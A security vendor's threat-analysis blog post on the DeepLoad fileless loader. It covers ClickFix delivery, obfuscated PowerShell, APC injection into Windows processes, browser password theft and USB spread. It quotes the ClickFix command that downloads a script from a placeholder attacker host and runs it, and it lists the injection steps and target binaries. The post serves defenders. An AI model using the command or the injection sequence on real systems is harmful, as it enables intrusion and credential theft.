DeepLoad Malware Explained: ClickFix Delivery and Password Stealing

Umut Bayram | 4 MIN READ

| May 22, 2026

Key Takeaways

  • DeepLoad is a fileless loader delivered via ClickFix, tricking victims into pasting a malicious PowerShell command into Windows Run or a terminal.
  • The payload is injected into trusted Windows processes (such as LockAppHost.exe) via asynchronous procedure calls (APC) to evade detection.
  • Credential theft runs on two tracks: filemanager.exe harvests saved browser passwords, while a malicious browser extension captures credentials in real time.
  • DeepLoad spreads via USB drives by dropping over 40 shortcut (.lnk) files disguised as common installers, each capable of re-triggering the full infection chain.
  • Picus Threat Library includes dedicated DeepLoad simulation threats (IDs 56483 and 37782) across email and network infiltration modules to validate security controls.

DeepLoad, first observed in March 2026, is a fileless loader observed in enterprise compromises. Delivery of the malware happens through ClickFix, a social engineering technique where the user is tricked into pasting an attacker-supplied command into Windows Run or a terminal under the guise of fixing a fake browser error.

The loader uses obfuscation to defeat static scanning. Real and encrypted code sits buried under thousands of meaningless variable assignments. Decryption happens in memory through XOR, so no decoded payload ever touches the disk. The active payload then injects into legitimate processes like LockAppHost.exe, the Windows lock screen process, which security tools rarely monitor for outbound activity.

Credential theft begins immediately and runs on a separate infrastructure from the loader. A standalone stealer named filemanager.exe scrapes saved browser passwords. Also, a malicious browser extension intercepts credentials as users type them.

In this blog, we examine how DeepLoad operates at each stage of the attack and explain how Picus helps simulate the malware to validate your security controls.

How Does DeepLoad Malware Work?

Initial Access: ClickFix Delivery

The attack chain opens with ClickFix, a social engineering method tricking users into running attacker commands themselves. Delivery typically happens through a fake browser error page or phishing site, instructing the user to paste a command into Windows Run or a terminal under the pretense of fixing a non-existent problem.

The command that is given to the victim to execute is given below [1]:

powershell.exe -ep Bypass -Command "iex(irm hxxp://<Malicious IP Address>:3015/index)"


# irm is short for Invoke-RestMethod, fetching content from a URL. iex is short for Invoke-Expression, running the fetched content as a script directly in memory. Combined, the command pulls a remote payload over HTTP and executes the payload.

The fetched payload creates a scheduled task configured to re-execute the loader on a schedule, giving the attacker reboot-survival.

Execution of Obfuscated Payload

In the execution phase, firstly, mshta.exe reaches out to the staging infrastructure to fetch an obfuscated PowerShell loader.

The retrieved PowerShell loader uses an obfuscation pattern. Real functionality sits hidden beneath thousands of meaningless variable assignments designed to look like normal scripting:

# In PowerShell, anything inside ${...} is treated as a variable name. The cmdlet names and the embedded windowsupdate.microsoft.com reference exist as decoys, designed to make the script read as benign during human review and to satisfy static scanners.


{Get-AuthenticodeSignature -InformationAction Continue -TaskPath \Microsoft\Windows\ && (aaa)} = "value1";


{Get-StoragePool -ErrorAction Stop -Uri windowsupdate.microsoft.com && (kebnn)} = "value2";


…

# Bottom of the script (The real and encrypted payload, which is decrypted using XOR operations and a hardcoded key)


$GelioSystem = @" "\xe8\x9b\xd5\x01\x00\x00\x90\x03\x00\x12..." "\xa9\xc9\xff\xbd\x94\x12\xac\x22\x8d\xee..." "@

Process Injection

DeepLoad selects a target process from a hardcoded list of three Windows binaries [1]:

string[] possiblePaths = {
@"C:\Windows\System32\LockAppHost.exe",
@"C:\Windows\System32\makecab.exe",
@"C:\Windows\System32\Magnify.exe"
};

Injection uses asynchronous procedure calls (APC). An APC is a Windows mechanism for queuing a function to run on a thread when the thread enters an alertable state.

The injection sequence:

  1. Launch LockAppHost.exe in a suspended state using CreateProcessA.
  2. Allocate memory inside the suspended process.
  3. Write decrypted shellcode into the allocated region using WriteProcessMemory.
  4. Queue the shellcode as an APC against the suspended thread using QueueUserAPC.
  5. Resume the thread. The thread enters an alertable state, the queued APC fires, and the shellcode runs inside LockAppHost.exe.

As a result, the active DeepLoad payload runs inside a trusted Windows binary, with no decoded shellcode ever touching the disk.

Credential Access: Two Independent Theft Paths

A standalone credential stealer named filemanager.exe runs alongside the loader. The stealer scrapes saved credentials from the host, with browser-stored passwords a primary target.

Also, a separate component drops and registers a browser extension, capturing credentials as users type them.

Lateral Movement: USB Propagation

DeepLoad spreads to connected USB drives. When a USB drive connects to an infected host, over 40 files are written to the drive, maximizing the chance of a click on a separate machine.

The dropped files are shortcut (.lnk) files disguised as common installers such as ChromeSetup.lnk, Firefox Installer.lnk, and AnyDesk.lnk. Each shortcut, when double-clicked on a new host, retriggers the full DeepLoad infection chain.

How Picus Simulates DeepLoad Malware Attacks?

We also strongly suggest simulating DeepLoad Malware Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the DeepLoad Malware Attacks:

Threat ID

Threat Name

Attack Module

56483

DeepLoad Infostealer Email Threat

E-mail Infiltration

37782

DeepLoad Infostealer Download Threat

Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] E. Blogs, “DeepLoad Malware Pairs ClickFix Delivery with AI-Generated Evasion,” ReliaQuest. Accessed: Apr. 29, 2026. [Online]. Available: https://reliaquest.com/blog/threat-spotlight-deepload-malware-pairs-clickfix-delivery-with-ai-generated-evasion/

 
DeepLoad is a fileless loader observed in enterprise compromises. It is delivered through ClickFix, a social engineering technique where users are tricked into pasting an attacker-supplied command into Windows Run or a terminal. The command is disguised as a fix for a fake browser error, but it fetches and executes a remote payload directly in memory.
DeepLoad uses obfuscation by burying real, encrypted code beneath thousands of meaningless variable assignments. Decryption happens in memory through XOR using a hardcoded key, so no decoded payload ever touches the disk. The active payload then injects into legitimate Windows processes like LockAppHost.exe, which security tools rarely monitor for outbound activity.
DeepLoad uses Asynchronous Procedure Calls (APC) for process injection. It launches a target process such as LockAppHost.exe in a suspended state, allocates memory inside it, writes decrypted shellcode using WriteProcessMemory, queues the shellcode as an APC, and then resumes the thread. This causes the shellcode to execute inside a trusted Windows binary.
DeepLoad uses two independent credential theft methods. A standalone stealer named filemanager.exe scrapes saved browser passwords from the host. Separately, a malicious browser extension is dropped and registered to intercept credentials in real time as users type them. Both components operate on infrastructure separate from the loader itself.
DeepLoad spreads through connected USB drives. When a USB drive is connected to an infected host, over 40 shortcut (.lnk) files are written to the drive. These files are disguised as common installers such as ChromeSetup.lnk, Firefox Installer.lnk, and AnyDesk.lnk. Double-clicking any of these shortcuts on a new machine triggers the full DeepLoad infection chain.
Picus Security Validation Platform includes dedicated threats for DeepLoad, covering both email and network infiltration scenarios. Threat ID 56483 covers the DeepLoad Infostealer Email Threat, and Threat ID 37782 covers the DeepLoad Infostealer Download Threat. Organizations can simulate these attacks to validate their security controls and receive actionable mitigation insights through a 14-day free trial of the Picus Platform.

Table of Contents

Ready to start? Request a demo